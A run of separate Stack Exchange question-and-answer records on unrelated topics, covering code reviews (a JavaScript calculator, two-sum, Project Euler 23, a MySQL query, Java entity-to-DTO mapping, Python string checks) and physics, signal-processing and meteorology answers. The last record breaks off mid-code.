Implement the main logic as a module with no UI (ideally unit tested)
Implement a snippet of code that demonstrates using the module, either by using hard-coded parameters, or input from the console
Implement the UI that uses the module, operations triggered by mouse or keyboard events, taking parameters from the events or the DOM
You can do all that without using any frameworks or anything fancy.
Step 1 could go in a single program.js file,
with no code execution in the global scope.
Step 2 could be a function called main in the same file,
and it could be executed in global scope.
At this point the program should be executable by node program.js.
No frameworks used.
By building up your programs this way,
you end up with reusable and testable components.
Your main questions
What redundancies am I failing to see and remove?
Not a lot, congrats!
In operateOnEntry,
the parsing of the operators has some similar elements,
essentially following this logic:
Find the index of an operator in the input array (which is a mix of numbers and operators)
Apply the operator using as arguments the left and right element
Replace the 3 values in the array with the result of the operation
Repeat until a single value remains
Instead of spelling out the steps for each operator one by one,
you could have a mapping of operators to operations,
loop over the operators according to their precedence,
and follow the common logic as outlined above.
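That table-driven approach can be sketched roughly as follows (shown in Python for brevity, since the shape carries over directly to JavaScript; the `OPS` map and `PRECEDENCE` list are illustrative names of mine, not part of the original code):

```python
# Hypothetical sketch: evaluate a tokenized expression such as [2, 'x', 3, '+', 4]
# by repeatedly collapsing operator/operand triples, highest precedence first.
OPS = {
    'x': lambda a, b: a * b,
    '/': lambda a, b: a / b,
    '+': lambda a, b: a + b,
    '-': lambda a, b: a - b,
}
PRECEDENCE = [('x', '/'), ('+', '-')]  # multiplicative before additive

def evaluate(tokens):
    tokens = list(tokens)
    for group in PRECEDENCE:
        i = 0
        while i < len(tokens):
            if tokens[i] in group:
                result = OPS[tokens[i]](float(tokens[i - 1]), float(tokens[i + 1]))
                tokens[i - 1:i + 2] = [result]  # replace the triple with its value
            else:
                i += 1
    return tokens[0]

print(evaluate([2, 'x', 3, '+', 4]))  # 10.0
```

Replacing the per-operator branches with a loop like this keeps the splice-and-reduce logic in one place.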
How is my naming for var's and functions? Is it clear or vague?
operateOnEntry doesn't describe well what it does.
What kind of operation? What kind of entry?
It actually evaluates a mathematical expression.
I'd call it evaluate and name its parameter expression,
and have this as a function of an abstraction (prototype) called Calculator.
filterUserInput doesn't describe well what it does.
To "filter" usually means to eliminate some values from the input.
This function takes a string as input,
it operates on some global values,
and returns either an array or a string.
I think this function needs to be redesigned,
naming alone cannot fix its issues.
let a, b, c is clearly not great.
And it's not great to declare variables up front when they can be declared when they are initialized.
I would have used let arg1 = ... and let arg2 = ...,
and use operator(arg1, arg2) inlined without assigning it to let result = ....
Take a look at the different kind of uses of the index variable:
} else if (userEntry.includes("/")) {
    index = userEntry.indexOf('/');
    a = Number(userEntry[index - 1]);
    b = Number(userEntry[index + 1]);
    c = a / b;
    userEntry.splice((index - 1), 3, c);
    return operateOnEntry(userEntry);
} else if (currentEntry.includes("+") || currentEntry.includes("-")) {
    index = userEntry[1];
    a = Number(userEntry[0]);
    b = Number(userEntry[2]);
    console.log("index: " + index);
    if (index == '+') {
The first use is good, it indicates the index of an array.
In the second use it's not actually an index, but something else.
Not related to naming, but to using variables, consider this:
testCurrentEntry = currentArea.textContent; //.split(regexOperands)
testCurrentEntry = testCurrentEntry.split(/([+\-\/x=])/g);
After the first assignment, testCurrentEntry has a string value.
After the second assignment, the same variable has an array value.
This quickly gets confusing.
A type-safe language would not let you do this, for your own good.
I suggest adopting the habit of not reusing a variable with multiple types,
even when the language allows it.
Another issue with variables is in operateOnEntry,
userEntry and currentEntry are used,
but they actually point to the same value.
This is both extremely confusing and extremely error-prone.
How is my overall readability? Is what I'm writing even clear, or is it hard to decipher?
I find it hard to understand, for several reasons:
The calculator logic and the UI are mixed together
The names don't describe themselves well
There are many global variables (ideally there should be none), and global state is always hard to follow
Are my comments helpful or redundant?
I haven't found a helpful comment,
but I haven't tried to understand the entire code.
Since you ask, here are some examples to improve.
This comment states the obvious:
//first we restrict input length to 17
if (currentArea.textContent.length > 17 || totalArea.textContent.length > 17) {
This comment is actually wrong: the function returns non-array values in some cases.
function filterUserInput(userInput) {
//this function converts the user input into an array
Incorrect comments cause harm.
It's best when the code can speak for itself without comments.
It's not always possible, but a good goal to strive for. | {
"domain": "codereview.stackexchange",
"id": 31621,
"tags": "javascript, beginner, calculator"
} |
Problem with deriving work done by the gravitational force and gravitational potential energy from first principles | Question: Suppose we have a system with two point masses of mass $M$ and mass $m$, and we want to derive the work done. Let's say $M$ is fixed, or $M \gg m$. Initially assume mass $m$ is at rest at a distance $a$ from $M$, and after some time it reaches $b$. We want to calculate the work done. Since the magnitude of the gravitational force is $\frac{GMm}{r^2}$ and the displacement of $m$ is towards the big mass, the force and displacement are in the same direction, so the work done should be positive. But if we calculate $\int_a^b F\cos(\theta) \,dx$ you get a different answer: it's negative. Since $b<a$ (gravity is an attractive force, so the distance between the masses decreases; the final distance is $b$ and the initial is $a$ by definition), the work integral is just $\int_a^b \frac{GMm}{r^2} \,dr$. This has to be right because the displacement and force are in the same direction, so the force multiplied by $dr$ is as I showed above. Now when you calculate this integral you get $GMm(\frac{1}{a}-\frac{1}{b})$, which is clearly negative. What am I doing wrong? If you continue with this working to calculate the potential energy you get it as positive, which is also wrong. What's the mistake? The same reasoning applied to the spring force and other phenomena gives the correct result, but for gravity something is going wrong. What is it?
Answer: One way to look at what is going on is that when you do an integral like
$$
\int_a^b f(r) dr
$$
with $a>b$, then $dr$ is negative. More precisely, if you convert this integral into a Riemann sum,
$$
\sum_{i=1}^N f(r_i) \Delta r
$$
with $r_1=a>r_N=b$, then $\Delta r=\frac{b-a}{N}<0$.
So let's go back to how we would do the dot product to get to the integral for work. To do this carefully, we need a vector expression for the force (not just the magnitude). We introduce a unit vector $\hat{e}_r$ that points radially outward. Then
$$
\vec{F} = -\frac{GMm}{r^2}\hat{e}_r
$$
since the force points radially inward.
Now we come to the displacement vector -- this is the tricky part. What you would like to say is that the displacement is radially inward, so that
$$
d\vec{r} = -\hat{e}_r dr \ \ \ {\rm (WRONG)}
$$
However, this is wrong, because:
We know $-\hat{e}_r$ points radially inward
We know that $dr$ is negative, by the argument above.
Therefore, combining the above two points, $-\hat{e}_r dr$ points radially outward, but we know that the actual displacement $d\vec{r}$ must point radially inward.
Therefore, the correct equation here is
$$
d\vec{r} = {\color{red} +} \hat{e}_r dr
$$
With this substitution, we get
\begin{eqnarray}
W = \int \vec{F} \cdot d\vec{r} = - (\hat{e}_r \cdot \hat{e}_r) \int_a^b \frac{GMm}{r^2} dr = {\color{red}-} \int_a^b \frac{GMm}{r^2} dr = GMm \left(\frac{1}{b}-\frac{1}{a}\right) > 0
\end{eqnarray}
as expected.
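A quick numerical sanity check of that result (an illustrative sketch; the values for $G$, $M$, $m$, $a$, $b$ below are arbitrary): approximating $-\int_a^b \frac{GMm}{r^2}\,dr$ by a Riemann sum with the negative $dr$ discussed above reproduces $GMm\left(\frac{1}{b}-\frac{1}{a}\right) > 0$.

```python
# Midpoint Riemann sum for W = -∫_a^b GMm/r^2 dr with a > b (falling inward).
G, M, m = 6.674e-11, 5.0e24, 10.0   # arbitrary illustrative values (SI units)
a, b = 2.0e7, 1.0e7                  # initial and final radii, a > b

N = 100_000
dr = (b - a) / N                     # negative, because b < a
W = sum(-G * M * m / (a + (i + 0.5) * dr) ** 2 * dr for i in range(N))

exact = G * M * m * (1.0 / b - 1.0 / a)
print(W > 0, abs(W - exact) / exact < 1e-9)  # True True
```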
Another way to say this, which is perhaps less error prone, is that the displacement is
$$
d\vec{r} = \hat{e}_r |dr|
$$
You can avoid having to worry about the sign, if you remember that $|dr|$ means you should always choose the limits of integration to go from the smaller $r$ value to the larger $r$ value, so that $dr>0$ and $|dr|=dr$. | {
"domain": "physics.stackexchange",
"id": 100471,
"tags": "newtonian-mechanics, forces, newtonian-gravity, work, integration"
} |
String validation based on multiple criteria | Question: I had me a code challenge and I was thinking: is there a way to make this more efficient and short? The challenge requires me to scan a string and ...
In the first line, print True if it has any alphanumeric characters. Otherwise, print False.
In the second line, print True if it has any alphabetical characters. Otherwise, print False.
In the third line, print True if it has any digits. Otherwise, print False.
In the fourth line, print True if it has any lowercase characters. Otherwise, print False.
In the fifth line, print True if it has any uppercase characters. Otherwise, print False.
Below is my approach :
def func_alnum(s):
    for i in s:
        if i.isalnum():
            return True
    return False

def func_isalpha(s):
    for i in s:
        if i.isalpha():
            return True
    return False

def func_isdigit(s):
    for i in s:
        if i.isdigit():
            return True
    return False

def func_islower(s):
    for i in s:
        if i.islower():
            return True
    return False

def func_isupper(s):
    for i in s:
        if i.isupper():
            return True
    return False

if __name__ == '__main__':
    s = input()
    s = list(s)
    print(func_alnum(s))
    print(func_isalpha(s))
    print(func_isdigit(s))
    print(func_islower(s))
    print(func_isupper(s))
It feels like I made a mountain out of a molehill. But I would defer to your opinions on efficiency and shortness before I live with that opinion.
Answer: Your five functions only differ by the predicate used to test each character, so you could have a single one parametrized by said predicate:
def fulfill_condition(predicate, string):
    for character in string:
        if predicate(character):
            return True
    return False

if __name__ == '__main__':
    s = input()
    print(fulfill_condition(str.isalnum, s))
    print(fulfill_condition(str.isalpha, s))
    print(fulfill_condition(str.isdigit, s))
    print(fulfill_condition(str.islower, s))
    print(fulfill_condition(str.isupper, s))
Note that you don't need to convert the string to a list for this to work, strings are already iterables.
Now we can simplify fulfill_condition even further by observing that it applies the predicate to each character and returns whether any one of the results is True. This can be written:
def fulfill_condition(predicate, string):
    return any(map(predicate, string))
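A quick check of that one-liner (restated here so the snippet is self-contained; the sample strings are arbitrary):

```python
def fulfill_condition(predicate, string):
    return any(map(predicate, string))

print(fulfill_condition(str.isalpha, "qA2"))  # True
print(fulfill_condition(str.isdigit, "qA2"))  # True
print(fulfill_condition(str.isupper, "abc"))  # False
print(fulfill_condition(str.isalnum, "#:)"))  # False
```

Note that `any` short-circuits, so scanning stops at the first matching character, just like the explicit loop.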
Lastly, if you really want to have 5 different functions, you can use functools.partial:
from functools import partial
func_alnum = partial(fulfill_condition, str.isalnum)
func_isalpha = partial(fulfill_condition, str.isalpha)
func_isdigit = partial(fulfill_condition, str.isdigit)
func_islower = partial(fulfill_condition, str.islower)
func_isupper = partial(fulfill_condition, str.isupper) | {
"domain": "codereview.stackexchange",
"id": 35206,
"tags": "python, python-3.x, strings"
} |
Is there a more optimized way for this MySQL query? | Question: With the query below I'm getting the results that I want, but it's quite slow, taking nearly 0.2 seconds (on an i5 machine). Is there a more optimized way to get the same results?
Basically, this query fetches the last 20 rows in the table, shows only one row per yzr.name, and orders by yzr.favorite_count.
SELECT gzt.name AS gazete,
       yz.*,
       yzr.name,
       yzr.gazete_id,
       yzr.yazar_image_link,
       yzr.favorite_count,
       DATE_FORMAT(tarih, '%d.%m.%Y') AS formatted_tarih
FROM yazar AS yzr
INNER JOIN yazi yz ON yzr.id = yz.yazar_id
INNER JOIN gazete gzt ON yzr.gazete_id = gzt.id
GROUP BY yzr.name
ORDER BY yzr.favorite_count DESC
LIMIT 20 OFFSET 0
Answer: As you have no aggregate functions applied in the SELECT clause, I don't understand why you need the GROUP BY clause.
The expression is way too simple to be optimized (it's hard to see how you can go wrong).
For any optimization advice you will need to provide the table definitions and an explanation of the normal form the data has been decomposed to. Optimization of SQL queries usually lies in the table structure, and in not decomposing the data all the way to fully actualized third normal form.
"domain": "codereview.stackexchange",
"id": 3609,
"tags": "optimization, mysql, sql"
} |
Project Euler problem 23 - non-abundant sums | Question: I present my solution for Project Euler problem 23 written in Python (2.7).
The problem statement is:
A perfect number is a number for which the sum of its proper divisors
is exactly equal to the number. For example, the sum of the proper
divisors of 28 would be 1 + 2 + 4 + 7 + 14 = 28, which means that 28
is a perfect number.
A number whose proper divisors are less than the number is called
deficient and a number whose proper divisors exceed the number is
called abundant.
As 12 is the smallest abundant number, 1 + 2 + 3 + 4 + 6 = 16, the
smallest number that can be written as the sum of two abundant numbers
is
24. By mathematical analysis, it can be shown that all integers greater than 28123 can be written as the sum of two abundant numbers.
However, this upper limit cannot be reduced any further by analysis
even though it is known that the greatest number that cannot be
expressed as the sum of two abundant numbers is less than this limit.
Find the sum of all the positive integers which cannot be written as
the sum of two abundant numbers.
I have done everything to my knowledge to make the code run as fast as possible. It takes about 600 milliseconds on my machine.
It is one of the first times that I actually put the else part of the for statement to use. Using any alternatively turned out to be about 1.5× as slow.
SMALLEST_ABUNDANT = 12
# largest number for which we have to test if it can be expressed as the
# sum of two abundant numbers
MAX_TEST_SUM_OF_TWO_ABUNDANT = 28123
# largest number for which we have to know if it is abundant
MAX_TEST_ABUNDANT = MAX_TEST_SUM_OF_TWO_ABUNDANT - SMALLEST_ABUNDANT
# largest possible divisor that we have to consider
MAX_DIVISOR = MAX_TEST_ABUNDANT / 2

from collections import defaultdict

def solve_euler23():
    """Return the sum of all positive integers which cannot be written
    as the sum of two abundant numbers.
    """
    # mapping from a number to the set of its proper divisors (i.e.,
    # excluding the number itself)
    divisors = defaultdict(set)
    for divisor in range(1, MAX_DIVISOR+1):
        for number in range(2*divisor, MAX_TEST_ABUNDANT+1, divisor):
            divisors[number].add(divisor)

    def is_abundant(number):
        return sum(divisors[number]) > number

    abundant_numbers = sorted(filter(is_abundant, divisors))
    # make a set so that membership can be tested efficiently
    abundant_numbers_set = set(abundant_numbers)

    impossible_sum_of_two_abundant_numbers = []
    for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
        for abundant in abundant_numbers:
            if number - abundant in abundant_numbers_set:
                break  # is the sum of two abundant numbers
        else:
            impossible_sum_of_two_abundant_numbers.append(number)

    return sum(impossible_sum_of_two_abundant_numbers)

if __name__ == '__main__':
    print solve_euler23()
My questions are:
Is there a better algorithm?
Did I overlook something which would make the implementation of my chosen algorithm more efficient?
Can I make the code shorter or clearer?
Answer: 1. Sieving for sums
The computation of the sum of divisors can be improved using a bit of math. Let's call the sum-of-divisors function \$σ\$, and consider \$σ(60)\$: $$ σ(60) = 1 + 2 + 3 + 4 + 5 + 6 + 10 + 12 + 15 + 20 + 30 + 60. $$ Collect together the divisors by powers of 2: $$ \eqalign{σ(60) &= (1 + 3 + 5 + 15) + (2 + 6 + 10 + 30) + (4 + 12 + 20 + 60) \\ &= (1 + 2 + 4)(1 + 3 + 5 + 15) \\ &= (1 + 2 + 4)σ(15)}. $$ Then do the same thing for \$σ(15)\$, collecting together the divisors by powers of 3: $$ \eqalign{σ(15) &= (1 + 5) + (3 + 15) \\ &= (1 + 3)(1 + 5) \\ &= (1 + 3)σ(5)}. $$ And so on, getting \$σ(60) = (1 + 2 + 4)(1 + 3)(1 + 5)\$. In general, if we can factorize \$n\$ as: $$ n = 2^a3^b5^c\dotsm $$ then $$ σ(n) = (1 + 2 + \dotsb + 2^a)(1 + 3 + \dotsb + 3^b)(1 + 5 + \dotsb + 5^c)\dotsm $$ These multipliers occur many times, for example \$(1 + 2 + 4)\$ occurs in the sum of divisors of every number divisible by 4 but not by 8, so it's most efficient to sieve for the sums of many divisors at once, like this:
def all_sum_divisors(n):
    """Return a list of the sums of divisors for the numbers below n.

    >>> all_sum_divisors(10) # https://oeis.org/A000203
    [1, 1, 3, 4, 7, 6, 12, 8, 15, 13]
    """
    result = [1] * n
    for p in range(2, n):
        if result[p] == 1:  # p is prime
            p_power, last_m = p, 1
            while p_power < n:
                m = last_m + p_power
                for i in range(p_power, n, p_power):
                    result[i] //= last_m
                    result[i] *= m
                last_m = m
                p_power *= p
    return result
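One way to gain confidence in a sieve like this is to cross-check it against a brute-force divisor sum on small inputs; a sketch of such a check (my own addition, not part of the original answer):

```python
# Brute-force sum of divisors: obviously correct for small k, if slow.
def sigma(k):
    return sum(d for d in range(1, k + 1) if k % d == 0)

# These match the docstring values above (https://oeis.org/A000203) for k = 1..9.
print([sigma(k) for k in range(1, 10)])                    # [1, 3, 4, 7, 6, 12, 8, 15, 13]

# And the problem statement's claim: 12 is the smallest abundant number.
print(min(k for k in range(1, 100) if sigma(k) > 2 * k))   # 12
```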
2. Review
I would change the signature of the function as follows:
def solve_euler23(n=28124):
    """Return the sum of all positive integers below n which cannot be
    written as the sum of two abundant numbers."""
The reason for doing this is to make it possible to test the function on small instances: for example, you could test the claim in the problem statement (that 24 is the smallest number that cannot be written etc.), by running solve_euler23(24) and checking that it returns \$ \sum_{1≤i<24}i=276 \$, and then running solve_euler23(25) and checking that it returns the same result.
The division operator / returns a float in Python 3, so for portability it would be worth writing:
MAX_DIVISOR = MAX_TEST_ABUNDANT // 2
The efficiency gain of avoiding computing the sum of divisors of the numbers up to SMALLEST_ABUNDANT (12) is negligible, and it deprives you of the chance to check that your sum-of-divisors algorithm is correct on small numbers (for example, an off-by-one error might lead it to deduce that 6 is abundant, but if you started at 12 you might have trouble spotting the bug).
The question only asks for the sum of the positive integers which cannot be written as the sum of two abundant numbers, so it's not necessary to keep a list of the numbers themselves.
When looking for sums adding up to number, the code tests every abundant number:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
    for abundant in abundant_numbers:
        if number - abundant in abundant_numbers_set:
            break
but we only need to test abundant numbers up to number // 2 (if two abundant numbers add up to number, then one of them will be no more than number // 2). We could test for this in the loop:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
    for abundant in abundant_numbers:
        if number - abundant in abundant_numbers_set:
            break
        elif abundant >= number // 2:
            impossible_sum_of_two_abundant_numbers.append(number)
            break
but because abundant_numbers is sorted, we can quickly calculate how far along this list we need to go, using bisect.bisect and itertools.islice:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
    for abundant in islice(abundant_numbers,
                           bisect(abundant_numbers, number // 2)):
        if number - abundant in abundant_numbers_set:
            break
3. Revised code
from bisect import bisect
from itertools import islice

def solve_euler23(n=28124):
    """Return the sum of all positive integers below n which cannot be
    written as the sum of two abundant numbers.
    """
    sum_divisors = all_sum_divisors(n)
    abundant = [i for i in range(1, n) if sum_divisors[i] > 2 * i]
    abundant_set = set(abundant)

    def unsums():
        for i in range(1, n):
            for j in islice(abundant, bisect(abundant, i // 2)):
                if i - j in abundant_set:
                    break
            else:
                yield i

    return sum(unsums())
I find this is about three times as fast as the code in the original post. | {
"domain": "codereview.stackexchange",
"id": 13831,
"tags": "python, performance, programming-challenge, python-2.x"
} |
two-sum algorithm | Question: Can someone help me optimize the code here?
This is the original question
Given an array of integers, return indices of the two numbers such
that they add up to a specific target.
You may assume that each input would have exactly one solution, and
you may not use the same element twice.
Question link: https://leetcode.com/problems/two-sum/
/**
 * @param {number[]} nums
 * @param {number} target
 * @return {number[]}
 */
var twoSum = function(nums, target) {
    const hashMapArray = {}
    for (let i = 0; i < nums.length; i++) {
        const num = nums[i]
        for (let index in hashMapArray) {
            if (hashMapArray[index] + num === target) {
                return [index, i]
            }
        }
        hashMapArray[i] = num
    }
    return []
}
Frankly, I was expecting my code to be optimized, but this is what I got as a result, and I was kinda heartbroken.
How can I make it better?
Results:
Answer: I cannot work out why you are iterating the mapped values. The point of mapping the values is so you do not need to search them.
Rather than use an object to map the values you can also use a Map, though there is not much of a performance gain.
The following at most will only iterate each item once and thus save you a significant amount of CPU time.
function twoSum(nums, target) {
    const map = new Map(), len = nums.length;
    var i = 0;
    while (i < len) {
        const num = nums[i], val = target - num;
        if (map.has(val)) { return [i, map.get(val)] }
        map.set(num, i);
        i++;
    }
    return [];
}
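Since this thread mixes languages, here is the same single-pass idea in Python (an illustrative port of mine, not part of the original answer; LeetCode accepts the two indices in either order):

```python
def two_sum(nums, target):
    # Map each seen value to its index; look up the complement before storing,
    # so every element is visited at most once: O(n) time, O(n) extra space.
    seen = {}
    for i, num in enumerate(nums):
        complement = target - num
        if complement in seen:
            return [seen[complement], i]
        seen[num] = i
    return []

print(two_sum([2, 7, 11, 15], 9))  # [0, 1]
```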
To save memory you can use the following. It will be slower than the above function; however, it will still be a lot faster than your function, as the inner loop only searches from the outer loop's current position.
function twoSum(nums, target) {
    const len = nums.length;
    var i = 0, j;
    while (i < len) {
        const val = target - nums[i];
        j = i + 1;
        while (j < len) {
            if (nums[j] === val) { return [i, j] }
            j++;
        }
        i++;
    }
    return [];
} | {
"domain": "codereview.stackexchange",
"id": 36476,
"tags": "javascript, performance, programming-challenge, time-limit-exceeded"
} |
How can metals absorb light? | Question: We're told that semiconductors have a bandgap and photons of an energy greater than the bandgap can be absorbed, exciting electrons from the valence band to conduction band. This therefore defines their absorption spectrum.
However, metals do not have a bandgap as the uppermost energy band is half-filled. What, therefore, defines their absorption spectrum please? I've read about free-carrier absorption - is this related?
Thanks
Answer: In a metal, light will interact both with the electrons in the conduction band and with the valence electrons of the metal lattice.
If the frequency is above the so-called plasma frequency, the conduction-band electrons can be considered free (very few collisions per oscillation period). The electrons simply re-emit the light, which makes the metal transparent. However, at lower frequencies, such as in the visible range, the conduction-band electrons collide with the lattice on a timescale much shorter than the period of the wave, and they absorb the energy without being able to re-emit it. Basically, due to the lattice collisions, the electrons cannot follow the incoming light. This absorption prevents the light from penetrating the metal.
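To put a rough number on "the plasma frequency": in the free-electron (Drude) picture it is $\omega_p = \sqrt{n e^2 / (\varepsilon_0 m_e)}$. A back-of-the-envelope estimate (the conduction-electron density below is a typical textbook value for copper, used here as an assumption):

```python
import math

# Drude-model plasma frequency: omega_p = sqrt(n e^2 / (eps0 m_e))
e = 1.602e-19      # elementary charge, C
m_e = 9.109e-31    # electron mass, kg
eps0 = 8.854e-12   # vacuum permittivity, F/m
n = 8.5e28         # conduction-electron density of copper, m^-3 (assumed)

omega_p = math.sqrt(n * e**2 / (eps0 * m_e))
print(f"omega_p ~ {omega_p:.2e} rad/s")
```

That lands in the ultraviolet, well above visible-light frequencies (a few times $10^{15}$ rad/s), consistent with the paragraph above: visible light is below the plasma frequency and is strongly reflected.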
The effect of strong absorption, somewhat counter-intuitively, leads to reflection. Because the waves do not penetrate deeply, not many of the conduction electrons see the incoming wave, and not that much overall energy is absorbed. Most of the energy is reflected by the first few layers of metal atoms in the lattice, with a spectrum that depends on the scattering properties of those particular metal atoms. | {
"domain": "physics.stackexchange",
"id": 25158,
"tags": "optics, metals, absorption"
} |
In the context of transfer functions, what is the relationship between the terms "proper", "causal", and "realizable"? | Question: I am thinking about these terms in the context of linear control.
A transfer function is proper if the degree of the numerator is not greater than the degree of the denominator. I've read often that improper transfer functions are "not causal". I also often see the word "unrealizable" used often in this context.
If a control transfer function I've designed is improper, does that mean it is "non-causal" and/or "unrealizable"? What is the difference between these terms? What do they mean in practice?
Answer: Causality is a necessary condition for realizability. Stability (or, at least, marginal stability) is also important for a system to be useful in practice.
For linear time-invariant (LTI) systems, which are fully characterized by their transfer function, we get realizability constraints on the transfer function. For continuous-time LTI systems, if we work at frequencies for which the lumped element model is valid, we require the system's transfer function to be rational for the system to be realizable. Also for discrete-time LTI systems we require rationality of the transfer function, which implies that the system can be realized by adders, multipliers, and delay elements.
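As a concrete illustration of that last point, a rational transfer function $H(z) = B(z)/A(z)$ maps directly to a difference equation built from adders, multipliers, and delay elements. A minimal sketch (the one-pole example coefficients are made up):

```python
def lti_filter(b, a, x):
    """Direct-form difference equation for H(z) = B(z)/A(z), assuming a[0] = 1:
    y[n] = sum_k b[k] x[n-k] - sum_{k>=1} a[k] y[n-k]."""
    y = []
    for n in range(len(x)):
        acc = sum(b[k] * x[n - k] for k in range(len(b)) if n - k >= 0)
        acc -= sum(a[k] * y[n - k] for k in range(1, len(a)) if n - k >= 0)
        y.append(acc)
    return y

# H(z) = 1 / (1 - 0.5 z^-1): a single pole at z = 0.5, inside the unit circle,
# so the impulse response decays (stable): 1, 0.5, 0.25, 0.125, ...
print(lti_filter([1.0], [1.0, -0.5], [1.0, 0.0, 0.0, 0.0]))
```

Flipping the pole outside the unit circle (e.g. a = [1.0, -1.5]) makes the impulse response grow without bound, which is the unstable case described below.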
For an LTI system to be causal and stable, its poles must lie in the left half-plane (for continuous-time systems), or inside the unit circle (discrete-time systems). From this it follows that the rational transfer function of an LTI system must be proper, otherwise you would get one or more poles at infinity, causing the system to be unstable (or non-causal). | {
"domain": "dsp.stackexchange",
"id": 4878,
"tags": "linear-systems, control-systems, causality"
} |
Parsing: Entity Classes to DTO | Question: I'm building a GWT application for GAE, using JDO for Datastore access. I use an Entity class for data mapping, so it contains lots of persistence annotations:
@PersistenceCapable(identityType = IdentityType.APPLICATION)
public class AppointmentEntity implements Serializable {

    private static final long serialVersionUID = 1L;

    @PrimaryKey
    @Persistent(valueStrategy = IdGeneratorStrategy.IDENTITY)
    private Long id;

    @Persistent
    private String firstName;
    @Persistent
    private String lastName;
    @Persistent
    private String DNI;
    @Persistent
    private Date appointmentDate;
    @Persistent
    private String attendant;
    @Persistent
    private String treatment;
    @Persistent
    private String details;
    @Persistent
    private Date nextAppointment;
    @Persistent(serialized = "true")
    private DownloadableFile file;

    //getters and setters...
Because of the nature of GWT and JDO, I can't use these Entity classes in my presentation layer, so there's a need to pass Entity object attributes to the corresponding DTO, which is a POJO that has the same attributes as the Entity class:
public class AppointmentDTO implements Serializable {

    private static final long serialVersionUID = 1L;

    private Long id;
    private String firstName;
    private String lastName;
    private String DNI;
    private Date appointmentDate;
    private Date nextAppointmentDate;
    private String attendant;
    private String treatment;
    private String details;

    //getters and setters...
To do the job of mapping attributes I made a wrapper class that handles it, but it doesn't feel quite right to me. Does anyone have a better approach?
public class AppointmentWrapper {

    private List<AppointmentEntity> entitiesList;

    public AppointmentWrapper(List<AppointmentEntity> appointmentEntities) {
        entitiesList = appointmentEntities;
    }

    public List<AppointmentDTO> getDTOList() {
        List<AppointmentDTO> dtoList = new ArrayList<AppointmentDTO>();
        for (AppointmentEntity entity : entitiesList) {
            AppointmentDTO dto = new AppointmentDTO();
            dto.setId(entity.getId());
            dto.setFirstName(entity.getFirstName());
            dto.setLastName(entity.getLastName());
            dto.setAppointmentDate(entity.getAppointmentDate());
            dto.setNextAppointmentDate(entity.getNextAppointment());
            dto.setAttendant(entity.getAttendant());
            dto.setDetails(entity.getDetails());
            dto.setDNI(entity.getDNI());
            dto.setTreatment(entity.getTreatment());
            dtoList.add(dto);
        }
        return dtoList;
    }
}
Answer: There is this concerning GWT and GAE objects. If that doesn't work for you, I would rather have a class of public static methods that does the conversions rather than sticking it into some kind of "wrapper class" that contains object states. For example,
public final class JDOEntityUtil {

    static public AppointmentDTO toDTO(AppointmentEntity entity) {
        AppointmentDTO dto = new AppointmentDTO();
        dto.setId(entity.getId());
        dto.setFirstName(entity.getFirstName());
        dto.setLastName(entity.getLastName());
        dto.setAppointmentDate(entity.getAppointmentDate());
        dto.setNextAppointmentDate(entity.getNextAppointment());
        dto.setAttendant(entity.getAttendant());
        dto.setDetails(entity.getDetails());
        dto.setDNI(entity.getDNI());
        dto.setTreatment(entity.getTreatment());
        return dto;
    }

    static public AppointmentEntity toEntity(AppointmentDTO dto) {
        AppointmentEntity entity = new AppointmentEntity();
        entity.setId(dto.getId()); /* or however you want to construct this */
        entity.setFirstName(dto.getFirstName());
        entity.setLastName(dto.getLastName());
        entity.setAppointmentDate(dto.getAppointmentDate());
        entity.setNextAppointment(dto.getNextAppointmentDate());
        entity.setAttendant(dto.getAttendant());
        entity.setDetails(dto.getDetails());
        entity.setDNI(dto.getDNI());
        entity.setTreatment(dto.getTreatment());
        return entity;
    }
} | {
"domain": "codereview.stackexchange",
"id": 1418,
"tags": "java"
} |
Why would Google's map of areas affected by Hurricane Harvey have advisories for the west coast and other far away areas? | Question:
What behavior of this hurricane would lead to advisories for the west coast and even parts of Canada and Alaska, when the hurricane is in the South?
I have little experience in meteorology or any of the earth sciences really, so I am interested in how this would affect the weather or other conditions far away from where the hurricane is severe.
Answer: It seems like there is more than just a hurricane going on. According to the National Weather Service there are excessive heat advisories, gale warnings, etc. | {
"domain": "earthscience.stackexchange",
"id": 1190,
"tags": "meteorology, tropical-cyclone, extreme-weather"
} |
Thermodynamics at absolute zero | Question: Assume I have kept a single molecule in a vacuum at absolute zero (0 K). There is no energy left in the particle, and hence any type of motion is absent.
Now, what happens when I increase the temperature of that system? Does the molecule start to move? Does the energy increase?
What does temperature even mean in vacuum?
I don't know if I'm asking a good question, but this troubles me a lot.
Answer: The situation you described is not a vacuum because it has a single molecule in it, so what you're asking about is how the concept of temperature applies to an isolated molecule.
First, the idea that you can start at absolute zero even with a single molecule is not consistent because there will always be fluctuations/movement possible in the ground state of a quantum system (the zero point energy or ZPE). The cleanest example of this is the quantum harmonic oscillator: a particle in the ground state has an average position of zero ($\langle x \rangle = 0$), but the fluctuations are greater than zero ($\langle x^2 \rangle > 0$). Let's think about this in terms of the uncertainty principle. The uncertainty principle is given by $\Delta p\Delta x \geq \hbar /2$ where $\Delta x = \sqrt{\langle x^2 \rangle - \langle x \rangle^2}$ and $\Delta p = \sqrt{\langle p^2 \rangle - \langle p \rangle^2}$. Because $\langle x^2 \rangle >0$ and $\langle x \rangle = 0$, we can see that the uncertainty in the momentum is also non-zero. As we know, the kinetic energy is $p^2 / 2m$, so our energy uncertainty is non-zero as well.
Second, and onto the main point of your question, you can certainly define a concept of temperature with only one molecule. Consider that even a single molecule has many different energy levels (i.e. electronic, vibrational, and rotational degrees of freedom are all available). The partition function for our system is still defined as $Z = \sum_i \exp{\left(-\frac{E_i}{k_bT}\right)}$ where $E_i$ is the energy of the $i$th state.(See Note) So, if we start very near absolute zero we will see only contributions from the ground state, but as we increase the temperature of the system we will observe non-zero probabilities of populating excited states. Nothing is broken about the concept of temperature in this situation, the energy scales are just considerably smaller than those in an ideal gas.
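The temperature dependence of the state populations described above can be sketched numerically. This is a minimal illustration with a hypothetical three-level system in arbitrary units (with $k_B = 1$), not a real molecule: near absolute zero essentially all probability sits in the ground state, while at higher temperature the excited states carry noticeable weight.

```python
import math

def populations(energies, T, kb=1.0):
    # Boltzmann populations p_i = exp(-E_i / (kb*T)) / Z for one molecule's levels.
    weights = [math.exp(-e / (kb * T)) for e in energies]
    Z = sum(weights)  # the partition function
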